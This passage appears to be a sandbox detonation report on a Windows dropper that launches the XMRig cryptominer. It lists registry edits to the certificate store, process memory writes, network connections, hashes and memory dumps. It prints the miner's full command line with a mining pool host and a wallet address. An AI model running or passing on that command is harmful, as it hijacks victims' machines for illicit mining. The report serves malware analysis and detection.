561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3420 wrote to memory of 1104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3420 wrote to memory of 1104 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4116,i,11749492925348081608,8895412282206755658,262144 --variations-seed-version --mojo-platform-channel-handle=4300 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=2008,i,11749492925348081608,8895412282206755658,262144 --variations-seed-version --mojo-platform-channel-handle=3844 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| BE | 23.41.178.75:443 | www.bing.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| BE | 23.41.178.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 75.178.41.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.16.208.104.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1104-14-0x000001C8218A0000-0x000001C8218C0000-memory.dmp
memory/1104-15-0x000001C823190000-0x000001C8231B0000-memory.dmp
memory/1104-16-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-17-0x000001C8231B0000-0x000001C8231D0000-memory.dmp
memory/1104-18-0x000001C8231D0000-0x000001C8231F0000-memory.dmp
memory/1104-19-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-20-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-21-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-22-0x000001C8231B0000-0x000001C8231D0000-memory.dmp
memory/1104-23-0x000001C8231D0000-0x000001C8231F0000-memory.dmp
memory/1104-24-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-25-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-26-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-27-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-28-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-29-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-30-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-31-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-32-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-33-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-34-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-35-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-36-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-37-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-38-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-39-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-40-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-41-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-42-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-43-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-44-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-45-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-46-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-47-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-48-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-49-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-50-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-51-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-52-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-53-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-54-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-55-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-56-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-57-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-58-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-59-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-60-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-61-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-62-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-63-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-64-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-65-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-66-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-67-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-68-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-69-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-70-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-71-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-72-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-73-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-74-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-75-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-76-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-77-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-78-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-79-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-80-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-81-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
memory/1104-82-0x00007FF618F40000-0x00007FF619A43000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 14:58
Reported
2024-06-13 15:56
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1936 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1936 wrote to memory of 3564 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=3808,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=4124 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4184,i,11751898164297348119,13021661521765644467,262144 --variations-seed-version --mojo-platform-channel-handle=3672 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| BE | 23.41.178.75:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.178.41.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3564-14-0x0000017A2CAD0000-0x0000017A2CAF0000-memory.dmp
memory/3564-15-0x0000017A2E2D0000-0x0000017A2E2F0000-memory.dmp
memory/3564-16-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-18-0x0000017A2E310000-0x0000017A2E330000-memory.dmp
memory/3564-17-0x0000017A2E2F0000-0x0000017A2E310000-memory.dmp
memory/3564-19-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-20-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-23-0x0000017A2E310000-0x0000017A2E330000-memory.dmp
memory/3564-22-0x0000017A2E2F0000-0x0000017A2E310000-memory.dmp
memory/3564-21-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-24-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-25-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-26-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-27-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-28-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-29-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-30-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-31-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-32-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-33-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-34-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-35-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-36-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-37-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-38-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-39-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-40-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-41-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-42-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-43-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-44-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-45-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-46-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-47-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-48-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-49-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-50-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-51-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-52-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-53-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-54-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-55-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-56-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-57-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-58-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-59-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
memory/3564-60-0x00007FF7C3E70000-0x00007FF7C4973000-memory.dmp
